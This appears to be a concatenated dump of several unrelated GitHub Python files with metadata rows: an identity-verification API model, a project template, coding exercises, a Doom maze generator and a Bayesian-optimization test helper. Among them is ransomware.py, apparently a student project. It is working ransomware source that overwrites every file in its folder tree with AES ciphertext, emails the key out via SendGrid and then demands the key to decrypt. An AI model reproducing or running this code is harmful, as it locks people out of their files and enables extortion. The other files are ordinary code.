data_nascimento (Union[Unset, datetime.date]):
situacao_cpf (Union[Unset, PFFacialAnswerSituacaoCpf]): regular, suspensa, titular falecido, pendente de
regularização, cancelada por multiplicidade, nula, cancelada de oficio
sexo (Union[Unset, PFFacialAnswerSexo]): F - female, M - male
nacionalidade (Union[Unset, PFFacialAnswerNacionalidade]): 1 - brazilian, 2 - naturalized brazilian, 3 -
foreigner, 4 - brazilian born abroad
cnh (Union[Unset, CNHAnswer]):
filiacao (Union[Unset, FiliacaoAnswer]):
documento (Union[Unset, DocumentoAnswer]):
endereco (Union[Unset, EnderecoAnswer]):
biometria_face (Union[Unset, FaceAnswer]):
"""
nome: Union[Unset, str] = UNSET
data_nascimento: Union[Unset, datetime.date] = UNSET
situacao_cpf: Union[Unset, PFFacialAnswerSituacaoCpf] = UNSET
sexo: Union[Unset, PFFacialAnswerSexo] = UNSET
nacionalidade: Union[Unset, PFFacialAnswerNacionalidade] = UNSET
cnh: Union[Unset, CNHAnswer] = UNSET
filiacao: Union[Unset, FiliacaoAnswer] = UNSET
documento: Union[Unset, DocumentoAnswer] = UNSET
endereco: Union[Unset, EnderecoAnswer] = UNSET
biometria_face: Union[Unset, FaceAnswer] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
nome = self.nome
data_nascimento: Union[Unset, str] = UNSET
if not isinstance(self.data_nascimento, Unset):
data_nascimento = self.data_nascimento.isoformat()
situacao_cpf: Union[Unset, str] = UNSET
if not isinstance(self.situacao_cpf, Unset):
situacao_cpf = self.situacao_cpf.value
sexo: Union[Unset, str] = UNSET
if not isinstance(self.sexo, Unset):
sexo = self.sexo.value
nacionalidade: Union[Unset, int] = UNSET
if not isinstance(self.nacionalidade, Unset):
nacionalidade = self.nacionalidade.value
cnh: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.cnh, Unset):
cnh = self.cnh.to_dict()
filiacao: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.filiacao, Unset):
filiacao = self.filiacao.to_dict()
documento: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.documento, Unset):
documento = self.documento.to_dict()
endereco: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.endereco, Unset):
endereco = self.endereco.to_dict()
biometria_face: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.biometria_face, Unset):
biometria_face = self.biometria_face.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if nome is not UNSET:
field_dict["nome"] = nome
if data_nascimento is not UNSET:
field_dict["data_nascimento"] = data_nascimento
if situacao_cpf is not UNSET:
field_dict["situacao_cpf"] = situacao_cpf
if sexo is not UNSET:
field_dict["sexo"] = sexo
if nacionalidade is not UNSET:
field_dict["nacionalidade"] = nacionalidade
if cnh is not UNSET:
field_dict["cnh"] = cnh
if filiacao is not UNSET:
field_dict["filiacao"] = filiacao
if documento is not UNSET:
field_dict["documento"] = documento
if endereco is not UNSET:
field_dict["endereco"] = endereco
if biometria_face is not UNSET:
field_dict["biometria_face"] = biometria_face
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
nome = d.pop("nome", UNSET)
_data_nascimento = d.pop("data_nascimento", UNSET)
data_nascimento: Union[Unset, datetime.date]
if isinstance(_data_nascimento, Unset):
data_nascimento = UNSET
else:
data_nascimento = isoparse(_data_nascimento).date()
_situacao_cpf = d.pop("situacao_cpf", UNSET)
situacao_cpf: Union[Unset, PFFacialAnswerSituacaoCpf]
if isinstance(_situacao_cpf, Unset):
situacao_cpf = UNSET
else:
situacao_cpf = PFFacialAnswerSituacaoCpf(_situacao_cpf)
_sexo = d.pop("sexo", UNSET)
sexo: Union[Unset, PFFacialAnswerSexo]
if isinstance(_sexo, Unset):
sexo = UNSET
else:
sexo = PFFacialAnswerSexo(_sexo)
_nacionalidade = d.pop("nacionalidade", UNSET)
nacionalidade: Union[Unset, PFFacialAnswerNacionalidade]
if isinstance(_nacionalidade, Unset):
nacionalidade = UNSET
else:
nacionalidade = PFFacialAnswerNacionalidade(_nacionalidade)
_cnh = d.pop("cnh", UNSET)
cnh: Union[Unset, CNHAnswer]
if isinstance(_cnh, Unset):
cnh = UNSET
else:
cnh = CNHAnswer.from_dict(_cnh)
_filiacao = d.pop("filiacao", UNSET)
filiacao: Union[Unset, FiliacaoAnswer]
if isinstance(_filiacao, Unset):
filiacao = UNSET
else:
filiacao = FiliacaoAnswer.from_dict(_filiacao)
_documento = d.pop("documento", UNSET)
documento: Union[Unset, DocumentoAnswer]
if isinstance(_documento, Unset):
documento = UNSET
else:
documento = DocumentoAnswer.from_dict(_documento)
_endereco = d.pop("endereco", UNSET)
endereco: Union[Unset, EnderecoAnswer]
if isinstance(_endereco, Unset):
endereco = UNSET
else:
endereco = EnderecoAnswer.from_dict(_endereco)
_biometria_face = d.pop("biometria_face", UNSET)
biometria_face: Union[Unset, FaceAnswer]
if isinstance(_biometria_face, Unset):
biometria_face = UNSET
else:
biometria_face = FaceAnswer.from_dict(_biometria_face)
pf_facial_answer = cls(
nome=nome,
data_nascimento=data_nascimento,
situacao_cpf=situacao_cpf,
sexo=sexo,
nacionalidade=nacionalidade,
cnh=cnh,
filiacao=filiacao,
documento=documento,
endereco=endereco,
biometria_face=biometria_face,
)
pf_facial_answer.additional_properties = d
return pf_facial_answer
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| paulo-raca/python-serpro | serpro/datavalid/models/pf_facial_answer.py | pf_facial_answer.py | py | 7,851 | python | pt | code | 0 | github-code | 90 |
12286378308 | import os
def join(paths): return os.path.join(*paths)
root_path = os.path.dirname(os.path.abspath(__file__))
dirs = [
join(["data", "raw"]),
join(["data", "processed"]),
join(["prediction_service", "model"]),
"notebooks",
"saved_models"]
for dir_ in dirs:
filedir = join([root_path, dir_, ".gitkeep"])
os.makedirs(os.path.dirname(filedir), exist_ok=True)
open(filedir, 'a').close()
files = [
"dvc.yaml",
"params.yaml",
".gitignore",
"app.py",
join(["prediction_service", "__init__.py"]),
join(["prediction_service", "prediction.py"]),
join(["src", "__init__.py"]),
join(["reports", "params.json"]),
join(["reports", "scores.json"]),
join(["tests", "conftest.py"]),
join(["tests", "test_config.py"]),
join(["tests", "__init__.py"]),
join(["webapp", "static", "css", "main.css"]),
join(["webapp", "templates", "index.html"]),
join(["webapp", "templates", "404.html"]),
join(["webapp", "templates", "base.html"]),
join(["webapp", "static", "script", "index.js"]),
join([".github", "workflows", "ci-cd.yaml"]),
"README.md"]
for file_ in files:
filedir = join([root_path, file_])
os.makedirs(os.path.dirname(filedir), exist_ok=True)
open(filedir, "a").close()
| guilherme9820/wine_quality | template.py | template.py | py | 1,284 | python | en | code | 0 | github-code | 90 |
5102881251 | import base64
import os
from base64 import b64encode
from Crypto.Cipher import AES
from base64 import b64decode
from Crypto.Random import get_random_bytes
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
def send_email(key):
message = Mail(
from_email='yargoryar@gmail.com',
to_emails='yaryna.gorodietska@gmail.com',
subject='b64_key',
html_content=key
)
sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
response = sg.send(message)
def test_encryption_on_one_word():
data = b"YARYNA"
key = get_random_bytes(16)
cipher = AES.new(key, AES.MODE_OFB)
ct_bytes = cipher.encrypt(data)
print(ct_bytes)
iv = b64encode(cipher.iv).decode('utf-8')
try:
iv = b64decode(iv)
cipher = AES.new(key, AES.MODE_OFB, iv=iv)
pt = cipher.decrypt(ct_bytes)
print("The message was: ", pt)
except (ValueError, KeyError):
print("Incorrect decryption")
def encryption(key, iv):
ransomware_path = os.path.realpath(__file__)
folder_path = os.path.dirname(os.path.abspath(__file__))
list_of_encrypted_files = []
for root, dirs, files in os.walk(folder_path):
for a_file in files:
full_file_path=f"{root}\\{a_file}"
if full_file_path != ransomware_path:
file = open(full_file_path,"rb")
data = file.read()
file.close()
file = open(full_file_path,"wb")
cipher = AES.new(key, AES.MODE_OFB, iv=iv)
encr = cipher.encrypt(data)
list_of_encrypted_files.append(a_file)
file.write(encr)
file.close()
print("Увага!")
print(f"Файли у {folder_path} і підпапках були зашифровані!")
print(list_of_encrypted_files)
def decryption(iv):
ui_key = input("Введіть ключ, щоб розшифрувати всі файли:")
dkey=base64.b64decode(ui_key)
try:
ransomware_path = os.path.realpath(__file__)
folder_path = os.path.dirname(os.path.abspath(__file__))
for root,dirs,files in os.walk(folder_path):
for a_file in files:
full_file_path=f"{root}\\{a_file}"
if full_file_path != ransomware_path:
file=open(full_file_path,"rb")
e_data=file.read()
file.close()
file=open(full_file_path,"wb")
d_cipher = AES.new(dkey, AES.MODE_OFB, iv=iv)
decr = d_cipher.decrypt(e_data)
file.write(decr)
file.close()
print(f"Файли {folder_path} і підпапках були розшифровані!")
except (ValueError, KeyError):
print("Розшифрування не відбулось!Ви ввели неправильний ключ!")
def main():
key = get_random_bytes(16)
b64_key = base64.b64encode(key).decode()
send_email(b64_key)
cipher = AES.new(key, AES.MODE_OFB)
iv = cipher.iv
encryption(key, iv)
decryption(iv)
main()
| yarynka28/university_project | ransomware.py | ransomware.py | py | 3,192 | python | en | code | 0 | github-code | 90 |
1332706372 | '''
349. Intersection of Two Arrays
Easy
Given two integer arrays nums1 and nums2, return an array of their intersection. Each element in the result must be unique and you may return the result in any order.
Example 1:
Input: nums1 = [1,2,2,1], nums2 = [2,2]
Output: [2]
Example 2:
Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
Output: [9,4]
Explanation: [4,9] is also accepted.
'''
'''
UMPIRE
U
assumptions: arrays are not sorted, contains only integers
M
set?
P
s1 = set(nums1)
s2 = set(nums2)
result = s1.intersection(y)
time: O(m + n + min(m,n))
create a dict for each value in nums1 as a key
by looping
loop through nums2
if num i in nums 2 is in dict
add to return list
time: O(m+n)
I
R
E
'''
def intersection(nums1, nums2):
d1 = {}
res = set()
for i in nums1:
d1[i] = d1.get(i, 0) + 1
for i in nums2:
if d1.get(i,0) != 0:
res.add(i)
return res
| dariusnguyen/algorithm_data_structure_replit | arrays_strings/aaa_arrays_intersection.py | aaa_arrays_intersection.py | py | 896 | python | en | code | 0 | github-code | 90 |
34946026546 | # Enter your code here. Read input from STDIN. Print output to STDOUT
import math
AB=int(input())
BC=int(input())
x=math.atan(BC/AB)
deg=math.degrees(x)
a=90-deg
a=round(a)
a=str(a)
print(a+chr(176))
| redietamare/competitive-programming | find-angle-MBC.py | find-angle-MBC.py | py | 201 | python | en | code | 0 | github-code | 90 |
7311384778 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 11:35:10 2018
@author: anonymous
cd /home/adam/Bureau
"""
import shutil
import random
import numpy as np
#These are used to write the wad file
from omg.wad import WAD
from scenario_generation.maze_functions import create_green_armor, create_red_armor, create_line_def, create_map_point, create_vertex, create_object
from scenario_generation.maze_functions import create_sector, create_side_def, create_spawn, gen_random_maze, create_red_pillar, create_green_pillar
import level_maker
import json
def create_maze(base_filepath, filename, width, height, rw, rh, cell_size):
# load the base files
BASE_WAD = 'custom_scenario.wad'
wad = WAD('scenarios/basefiles/' + BASE_WAD)
BASE_CFG = 'custom_scenario.cfg'
cfg_filename = '{}{}.cfg'.format(base_filepath,filename[:-4])
shutil.copy('scenarios/basefiles/' + BASE_CFG, cfg_filename)
#dealing with filename errors
if '/' in filename:
wad_filename = filename.split('/')[-1]
else:
wad_filename = filename
# change the maze name in .cfg file
# Read in the file
with open('scenarios/basefiles/' + BASE_CFG, 'r') as file:
filedata = file.read()
# Replace the target string
filedata = filedata.replace(BASE_WAD, wad_filename)
# Write the file out again
with open(cfg_filename, 'w') as file:
file.write(filedata)
#Initializing some variables
details = {}
verticies = []
wall_cons = []
wall_idx = 0
map_point_idx = 10
output_list = ['// Written by anonymous', 'namespace="zdoom";']
# create the two map points
xmin = -0
ymin = 0
map_point_idx += 1
#Génération des murs et de l'extérieur
ext_height = 1600
ext_width = 1600
padding = 0
exterior = [(-padding, -padding) , (-padding, ext_height+padding), (ext_width+padding, ext_height+padding), (ext_width+padding, -padding), (-padding, -padding) ]
walls, spawn = level_maker.draw_level(height=ext_height, width=ext_width)
verticies += exterior[:-1]
details['exterior'] = exterior[:-1]
details['walls'] = walls
#???
with open(base_filepath+filename[:-4]+'.json', 'w') as f:
json.dump(details, f)
#???
for k in range(4):
wall_cons.append((wall_idx + k, wall_idx + ((k +1)%4)))
wall_idx += 4
#Conversion des murs en verticies
pad = 8 #épaisseur des murs
for wall in walls:
x0,y0,x1,y1 = wall
# On regarde si le mur et vertical ou non
# Ajout d'une épaisseur aux murs
if x0 == x1:
verticies += [(x0-pad, y0), (x1+pad, y0),
(x1+pad, y1), (x0-pad, y1)]
else:
verticies += [(x0, y0-pad), (x1, y0-pad),
(x1, y1+pad), (x0, y1+pad)]
for k in range(4):
wall_cons.append((wall_idx + k, wall_idx + ((k +1)%4)))
wall_idx += 4
# Création des vertex, des line def et des side def (possibilité de modifier les textures)
for vx, vy in verticies:
output_list += create_vertex(vx, vy)
for id1, id2 in wall_cons:
output_list += create_line_def(id1,id2)
output_list += create_side_def()
output_list += create_sector()
##Placement des items et du spawn
spawn = (spawn[0], spawn[1])
#output_list += create_object(xmin + spawn[0]*cell_size + cell_size*1.5, ymin + spawn[1]*cell_size + cell_size/2, 2018, 50)
output_list += create_spawn(spawn[0], spawn[1])
details['spawn'] = spawn
#iterate through list to create output text file
output_string = ''
for output in output_list:
output_string += output + '\n'
wad.data['TEXTMAP'].data = output_string.encode()
wad.to_file(base_filepath +filename)
if __name__ == '__main__':
BASE_FILEPATH = "scenarios_transfer_learning/scenes/"
NUM_MAZES = 1
width=[1]*NUM_MAZES
rw=[random.randint(5, 8) for i in range(NUM_MAZES)]
height=[1]*NUM_MAZES
rh=[random.randint(1, 1) for i in range(NUM_MAZES)]
#Generate NUM_MAZES .was files
for m in range(0, NUM_MAZES):
filename = 'custom_scenario{:003}.wad'.format(m)
print('creating maze', filename)
create_maze(BASE_FILEPATH, filename, width[m], height[m], rw[m], rh[m], 200)
| Tzekh/PAr135_AIxplicability | Programs/3dcdrl/generate_scene.py | generate_scene.py | py | 4,553 | python | en | code | 0 | github-code | 90 |
898013209 | import numpy as np
from methods.oei import OEI
import gpflow
import sys
sys.path.append('..')
from benchmark_functions import scale_function, hart6
def create_model(batch_size=2):
options = {}
options['samples'] = 0
options['priors'] = 0
options['batch_size'] = batch_size
options['iterations'] = 5
options['opt_restarts'] = 2
options['initial_size'] = 10
options['model_restarts'] = 10
options['normalize_Y'] = 1
options['noise'] = 1e-6
options['nl_solver'] = 'bfgs'
options['hessian'] = True
options['objective'] = hart6()
options['objective'].bounds = np.asarray(options['objective'].bounds)
options['objective'] = scale_function(options['objective'])
input_dim = options['objective'].bounds.shape[0]
options['kernel'] = gpflow.kernels.Matern32(
input_dim=input_dim, ARD=False
)
options['job_name'] = 'tmp'
bo = OEI(options)
# Initialize
bo.bayesian_optimization()
return bo
| oxfordcontrol/Bayesian-Optimization | tests/create_model.py | create_model.py | py | 993 | python | en | code | 44 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.